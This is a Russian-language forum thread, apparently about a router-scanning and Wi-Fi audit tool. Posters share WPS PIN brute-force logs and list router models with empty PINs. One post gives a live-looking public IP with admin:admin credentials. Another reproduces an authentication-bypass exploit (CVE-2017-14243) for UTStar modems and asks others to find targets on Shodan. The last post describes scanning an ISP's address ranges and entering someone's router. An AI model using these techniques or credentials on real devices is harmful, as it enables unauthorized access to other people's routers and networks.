Traffic Inspector HTTP/FTP/Proxy server (2.0.1.721) (proxy server) - я правильно понимаю меня блокирует провайдер?
У вас соединение через прокси, либо на уровне провайдера, либо где-то в вашей сети. Наверняка какой-нибудь "родительский контроль" (сейчас провайдеры с прокси - редкость)
На правах оффтопа - у этого роутера очень интересный заводской wpa psk. Где то, а точнее много где я подобную генерацию уже видел: zte, huawei, tp-link adsl... Случайно прошивки от него нет в свободном доступе?
Попалась тоже такая точка, с любым PIN дальше M2 не идёт. Spoiler [*] Audit started. [*] Associating with AP... [+] Associated successfully. [*] Trying pin "55739078"... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] Manufacturer: Realtek Semiconductor Corp. [*] Model Name: RTL8671 [*] Model Number: EV-2006-07-27 [*] Serial Number: 123456789012347 [*] Device Name: Internet Router Device [*] Sending WPS Message M2... [*] Received WSC NACK. [-] Unknown error 000B. [*] Sending WSC NACK... ... ... ... [*] Audit stopped. [*] Audit started. [*] Associating with AP... [+] Associated successfully. [*] Trying pin "12345670"... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] Manufacturer: Realtek Semiconductor Corp. [*] Model Name: RTL8671 [*] Model Number: EV-2006-07-27 [*] Serial Number: 123456789012347 [*] Device Name: Internet Router Device [*] Sending WPS Message M2... [*] Received WSC NACK. [-] Unknown error 000B. [*] Sending WSC NACK...
Внешне эти DRGOS очень напоминают прошивку OpenWrt XWrt, и пути похожие. Вот ещё такой же: Возможно надо как-то твикать содержимое пакета M2 - на этом этапе Registrar (в данном случае RS) представляется точке доступа, но конкретных идей пока нет.
2,4 ГГц. И ещё такое несколько раз было, окно Wireless Audit Companion (не отвечает) и потом исчезает. Помогает RS свернуть в трей и снова открыть. Не знаю с чем связано, программно или с глюками моей системы.
Уже отлавливал, это особенность реализации VCL и дочерних окон при зависании основой формы. Достаточно развернуть / восстановить главное окно. А ещё в Main Menu есть пункт Audit, если он запущен.
было и у меня такое ) со встроенным вайфай вставил дангл usb и все заработало впав в азарт собрал все вайфай адаптеры. примерно половина работает. остальные такая надпись если это нужно автору - выложу список ) P.S. автору проги мега респект! супер мощный инструмент создан
Некоторые драйверы адаптеров не поддерживаются WinPcap'ом. Можете попробовать установить Npcap в режиме совместимости с WinPcap, может быть поможет. Мне пока несовместимые адаптеры не попадались. Для этого нужен Monitor Mode, в него пока может лишь Npcap, и на ограниченном числе адаптеров. А ещё он пока не умеет делать инъекцию пакетов. Пока не появятся стабильные API для режима мониторинга, этих фич ждать не стоит.
Оказались с пустым PIN: ZTE ZXHN H118N - 78:96:82:ХХ:ХХ:ХХ ZTE ZXHN H118N - 74:B5:7E:ХХ:ХХ:ХХ D-Link DIR-825AC - 1C:5F:2B:ХХ:ХХ:ХХ D-Link DIR-825AC - 80:26:89:ХХ:ХХ:ХХ D-Link DIR-825ACG1 - 74AA:ХХ:ХХ:ХХ SERCOMM RV6688BCM - 00:0E:8F:ХХ:ХХ:ХХ Spoiler: Не получает данные: 82.211.195.181:80 admin:admin
легко эксплуатируемый эксплойт на роутер UTStar WA3002G4 и iBall ADSL2+ Home Router Spoiler # Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability # CVE: CVE-2017-14243 # Date: 15-09-2017 # Exploit Author: Gem George # Author Contact: https://www.linkedin.com/in/gemgrge # Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem # Firmware version: WA3002G4-0021.01 # Vendor Homepage: http://www.utstar.com/ Vulnerability Details ====================== The CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source. How to reproduce =================== Suppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi Example URLs: * http://192.168.1.1/info.cgi a Status and details * http://192.168.1.1/upload.cgi a Firmware Upgrade * http://192.168.1.1/backupsettings.cgi a perform backup settings to PC * http://192.168.1.1/pppoe.cgi a PPPoE settings * http://192.168.1.1/resetrouter.cgi a Router reset * http://192.168.1.1/password.cgi a password settings POC ========= * на шодане примеров пока не нашел. нет времени. может кто найдет и отпишется?
Заметил такую интересную вещь у нас много ZTE ZXHN H118N на все 100% уверен что они в диапазонах 77.34.0.0-77.35.255.255, 86.102.0.0-86.102.255.255, 82.162.0.0-82.162.255.255, 5.143.0.0-5.143.255.255. Однако ни одного знакомого мак адреса при сканировании RS ни нахожу. Ради интереса узнал IP одного ZTE у знакомого и зашёл через браузер. Роутер спокойно меня пустил. Сканирую всё из сетки ростелекома.